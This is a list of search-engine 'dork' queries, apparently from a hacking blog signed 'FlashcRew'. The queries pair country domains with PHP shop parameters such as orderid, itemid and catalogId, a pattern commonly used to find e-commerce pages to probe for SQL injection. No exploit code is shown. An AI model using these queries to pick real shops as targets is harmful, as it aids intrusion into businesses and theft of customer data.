site:.ca inurl:".php?shopid=" site:.at inurl:".php?shopid=" site:.au inurl:".php?shopid=" site:.de inurl:".php?shopid=" site:.eu inurl:".php?shopid=" site:.us inurl:".php?shopid=" site:.fr  inurl:".php?itemid=" site:.uk inurl:".php?itemid=" site:.ca inurl:".php?itemid=" site:.at inurl:".php?itemid=" site:.au inurl:".php?itemid=" site:.de inurl:".php?itemid=" site:.eu inurl:".php?itemid=" site:.us inurl:".php?itemid=" site:.fr  inurl:".php?orderid=" site:.uk inurl:".php?orderid=" site:.ca inurl:".php?orderid=" site:.at inurl:".php?orderid=" site:.au inurl:".php?orderid=" site:.de inurl:".php?orderid=" site:.eu inurl:".php?orderid=" site:.us inurl:".php?orderid=" site:.fr  inurl:".php?catalogId=" site:.uk inurl:".php?catalogId=" site:.ca inurl:".php?catalogId=" site:.at inurl:".php?catalogId=" site:.au inurl:".php?catalogId=" site:.de inurl:".php?catalogId=" site:.eu inurl:".php?catalogId=" site:.us inurl:".php?catalogId=" site:.fr  inurl:".php?aid=" site:.uk inurl:".php?aid=" site:.ca inurl:".php?aid=" site:.at inurl:".php?aid=" site:.au inurl:".php?aid=" site:.de inurl:".php?aid=" site:.eu inurl:".php?aid=" site:.us inurl:".php?aid=" site:.fr  inurl:".php?artid=" site:.uk inurl:".php?artid=" site:.ca inurl:".php?artid=" site:.at inurl:".php?artid=" site:.au inurl:".php?artid=" site:.de inurl:".php?artid=" site:.eu inurl:".php?artid=" site:.us inurl:".php?artid=" site:.fr  inurl:".php?articleid=" site:.uk inurl:".php?articleid=" site:.ca inurl:".php?articleid=" site:.at inurl:".php?articleid=" site:.au inurl:".php?articleid=" site:.de inurl:".php?articleid=" site:.eu inurl:".php?articleid=" site:.us inurl:".php?articleid=" site:.fr  ##############################
__________________
 
FlashcRew Blog